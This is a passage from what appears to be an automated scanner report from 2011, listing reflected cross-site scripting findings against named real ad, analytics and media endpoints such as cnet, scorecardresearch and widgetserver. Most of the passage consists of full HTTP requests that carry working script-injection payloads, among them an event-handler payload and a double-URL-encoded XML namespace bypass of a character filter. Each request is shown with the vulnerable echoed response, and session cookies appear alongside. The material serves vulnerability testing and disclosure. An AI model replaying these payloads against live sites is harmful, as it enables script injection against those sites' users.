This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche178a'%3balert(1)//58b8a20ff4d HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_atf?t=1303946366067&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2xpe64Z76BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Wed, 27 Apr 2011 23:20:21 GMT
Expires: Wed, 27 Apr 2011 23:20:21 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Thu, 26-Apr-2012 23:20:21 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matche178a';alert(1)//58b8a20ff4d?admeld_adprovider_id=73&external_user_id=3419824627245671268"/>');

3.460. http://apex.com.com/aws/rest/v1.0/arrowUser [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apex.com.com
Path:	/aws/rest/v1.0/arrowUser

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9c9cc<script>alert(1)</script>acb9d13e1c6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aws/rest/v1.0/arrowUser?refUrl=&sId=175&ptId=2001&onId=22408&asId=0&edId=0&callback=parseArrowResponse9c9cc<script>alert(1)</script>acb9d13e1c6 HTTP/1.1
Host: apex.com.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:57:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: arrowLat=1303941458207; Domain=.cnet.com; Expires=Thu, 26-Apr-2012 21:57:38 GMT; Path=/
Set-Cookie: arrowSpc=1; Domain=.cnet.com; Expires=Fri, 27-May-2011 21:57:38 GMT; Path=/
Content-Length: 141

parseArrowResponse9c9cc<script>alert(1)</script>acb9d13e1c6( {"XCLGFbrowser": "Cg8JIk24ijttAAAASDs", "tempSessionId": "","userBuckets": []} )

3.461. http://api.cnet.com/restApi/v1.0/videoSearch [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnet.com
Path:	/restApi/v1.0/videoSearch

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d811e<script>alert(1)</script>dfb803997a7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restApi/v1.0/videoSearch?viewType=json&partTag=cntv&callback=LiveStreamStatusCheckR2D2.reqs.lssc_0.receiveLiveStatusd811e<script>alert(1)</script>dfb803997a7&videoIds=&iod=broadcast%2Clowcache&broadcastStatus=IN_PROGRESS&orderBy=broadcastStartTime&sortAsc=true HTTP/1.1
Host: api.cnet.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; arrowTmUser=false; cnet_rvpCallout=2; arrowLrps=1303941361935; arrowLat=1303946196991; arrowSpc=6; wsFd=true; arrowFdCounter=-1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:47 GMT
Server: Apache/2.2
Content-Length: 6442
Content-Type: text/plain

LiveStreamStatusCheckR2D2.reqs.lssc_0.receiveLiveStatusd811e<script>alert(1)</script>dfb803997a7({"CNETResponse":{"@version":"1.0","@realm":"video","Videos":{"@start":"0","@numReturned":"3","@numFound":"3","Video":[{"@id":"50083995","@xlink:href":"\/www-rb-api\/rest\/v1.0\/video?videoId=50083995&
...[SNIP]...

3.462. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload adf3e<script>alert(1)</script>b58a56df0c3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3adf3e<script>alert(1)</script>b58a56df0c3&c2=6035701&c3=5374276&c4=41748593&c5=61926988&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3adf3e<script>alert(1)</script>b58a56df0c3", c2:"6035701", c3:"5374276", c4:"41748593", c5:"61926988", c6:"", c10:"", c15:"", c16:"", r:""});

3.463. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8a1e8<script>alert(1)</script>1e01ed686d4 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=60357018a1e8<script>alert(1)</script>1e01ed686d4&c3=5374276&c4=41748593&c5=61926988&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"60357018a1e8<script>alert(1)</script>1e01ed686d4", c3:"5374276", c4:"41748593", c5:"61926988", c6:"", c10:"", c15:"", c16:"", r:""});

3.464. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 31c1f<script>alert(1)</script>856e82d9ddc was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035701&c3=537427631c1f<script>alert(1)</script>856e82d9ddc&c4=41748593&c5=61926988&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6035701", c3:"537427631c1f<script>alert(1)</script>856e82d9ddc", c4:"41748593", c5:"61926988", c6:"", c10:"", c15:"", c16:"", r:""});

3.465. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload de99a<script>alert(1)</script>79c1559ea54 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035701&c3=5374276&c4=41748593de99a<script>alert(1)</script>79c1559ea54&c5=61926988&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6035701", c3:"5374276", c4:"41748593de99a<script>alert(1)</script>79c1559ea54", c5:"61926988", c6:"", c10:"", c15:"", c16:"", r:""});

3.466. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 335dc<script>alert(1)</script>351c1ad24bd was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035701&c3=5374276&c4=41748593&c5=61926988335dc<script>alert(1)</script>351c1ad24bd&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6035701", c3:"5374276", c4:"41748593", c5:"61926988335dc<script>alert(1)</script>351c1ad24bd", c6:"", c10:"", c15:"", c16:"", r:""});

3.467. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload aeeef<script>alert(1)</script>774497375be was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035701&c3=5374276&c4=41748593&c5=61926988&c6=aeeef<script>alert(1)</script>774497375be& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 04 May 2011 23:15:26 GMT
Date: Wed, 27 Apr 2011 23:15:26 GMT
Connection: close
Content-Length: 1257

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6035701", c3:"5374276", c4:"41748593", c5:"61926988", c6:"aeeef<script>alert(1)</script>774497375be", c10:"", c15:"", c16:"", r:""});

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload c0d60<img%20src%3da%20onerror%3dalert(1)>f04bb18f6c6 was submitted in the REST URL parameter 14. This input was echoed as c0d60<img src=a onerror=alert(1)>f04bb18f6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21c0d60<img%20src%3da%20onerror%3dalert(1)>f04bb18f6c6/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 27 Apr 2011 23:15:41 GMT
Expires: Sat, 30 Apr 2011 23:14:41 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 9253

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_hidden_tabs=&wbx_theme_mod=%23FFFFFF&wbx_stageHeight=&var_SITE=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/e8cf8788-6b03-4c0c-8d03-44a859eb3751.png?36"}],"token":"30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21c0d60<img src=a onerror=alert(1)>f04bb18f6c6"});

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4b91<a>904519e1e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8c4b91<a>904519e1e4/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 27 Apr 2011 23:15:28 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1161

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"cc396f99-ff24-4e7b-bd0c-32d96c3767c8c4b91<a>904519e1e4","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 233d7%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ef2cce1b4f15 was submitted in the REST URL parameter 18. This input was echoed as 233d7<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f2cce1b4f15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669233d7%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ef2cce1b4f15/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=49217
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Wed, 27 Apr 2011 23:17:02 GMT
Expires: Sat, 30 Apr 2011 23:16:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 3414

<response><widgets><widget><token>24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669233d7<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f2cce1b4f15</token><app-id>54b05
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://cdn.widgetserver.com
Path:	/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7e79<a>022e5f546dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46eceb7e79<a>022e5f546dc/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=49217
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
